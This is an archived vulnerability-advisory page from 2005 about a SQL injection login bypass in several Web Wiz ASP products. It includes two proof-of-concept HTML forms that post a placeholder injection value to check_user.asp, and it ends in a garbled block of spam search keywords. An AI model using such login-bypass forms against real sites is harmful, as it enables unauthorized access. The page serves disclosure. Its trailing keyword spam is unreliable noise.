about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Web Wiz Multiple Products SQL Injection Vulnerability


Title Web Wiz Multiple Products SQL Injection Vulnerability
Published 2005-12-30-12:00AM
Updated 2005-12-30-04:27PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovered by DevilBox of KAPDA.
Vulnerable  Web Wiz Site News Access 97 3.0 6
Web Wiz Site News Access 2000 3.0 6
Web Wiz Polls Access 97 3.0 6
Web Wiz Polls Access 2000 3.0 6
Web Wiz Journal Access 97 1.0
Web Wiz Journal Access 2000 1.0
Web Wiz Database Login Access 97 1.71
Web Wiz Database Login Access 2000 1.71
Not Vulnerable  
Code   An exploit is not required.

The following proof of concept example is available:
<html>
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

<html>
<h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 15 Dec 2009 22:58:11 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
/search/ex www.xdwx.x netid mary Anak bandu t257t hermaphrod WWW.HAIFA. monw3c.blo lo360l asairstarn wwww.98.co www.horses emAlbum conexant freesexyvi for www.ho Seximges www.xxxl.c Shabnur MSN arab ladyb lindsy loh www.sse6.c wwwnangabo Waptricks. keygen sou news+for+C PHP Ini_Re cara de pi donkysex newsfilter ms06040 Sanisex sania mirz Dcash girl Crack+Data p.manohar_ M2u SEXVDOS 200 /compo jd-wiki 8.1 ?name=News Www+sex Applebottu sex700 lo898l oid Waptricks.